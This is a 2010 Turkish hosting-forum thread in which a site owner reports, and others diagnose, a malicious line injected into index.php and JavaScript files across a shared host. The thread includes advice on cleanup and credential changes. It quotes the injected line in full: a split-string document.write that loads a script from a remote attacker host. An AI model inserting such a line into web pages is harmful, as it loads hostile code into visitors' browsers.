• 20-10-2010, 02:43:58
    #1
    Üyeliği durduruldu
    Selam arkadaşlar host'daki dosyaları kontrol ederken gözüme çarptı
    document.write('<sc'+'ript type="text/javascript" src="http://revise.paresmultimarca.com:8080/Terabyte.js"></scri'+'pt>');

    index.php lerde ve java script dosyalarının en altında böyle satırlar var ve kasıyor sayfayı...
    Orjinalinde böyle birşey olacağını sanmıyorum çünkü hostingdeki tüm sitelerin dosyalarında var...
    Karşılaşan oldumu veya nedir bu kurtulmanın çaresi yokmu?

    Teşekkürler.
  • 20-10-2010, 02:58:50
    #2
    Evet bu bir virüs ve işin kötüsü, eklendiği dosyalarda, eklendiği satırdan sonrasını siler muhtemelen. Yani sadece js kodunu silerek temizleyemezsiniz, dosyanın yedeğini de atmanız gerekir.
  • 20-10-2010, 03:00:21
    #3
    Üyeliği durduruldu
    Sayfanın en altına ekliyor. Onları kaldırınca sayfada problem yok ama nerden ve nasıl bulaşıyor anlamadım?
  • 20-10-2010, 03:22:47
    #4
    Bu türde bir virüs son gördüğümde birkaçbin dosya içeren bir sistemin tüm index ve default isimli dosyaları ile tüm js uzantılı dosyalarına bulaşmıştı. Benim gördüğümün spam e-posta gönderimi için hesabın e-posta fonksiyonunu kullanıyordu. İşi spam yapmaktı yani. Virüsler ftp erişimi alan tüm bilgisayarlardan siteye, siteden de bu bilgisayarlara bulaşır. Kodu sildim diyerek içiniz rahat olmasın. Hem site dzininde hem bilgisayarınızda tam bir temizlik yaptığınızdan emin olduktan sonra erişim bilgilerini muhakkak değiştirin. Yoksa 2-3 saate kadar (ya da tetikleyicisinin periyodu ne ise) yeniden ortaya çıkar.
    Geçmiş olsun.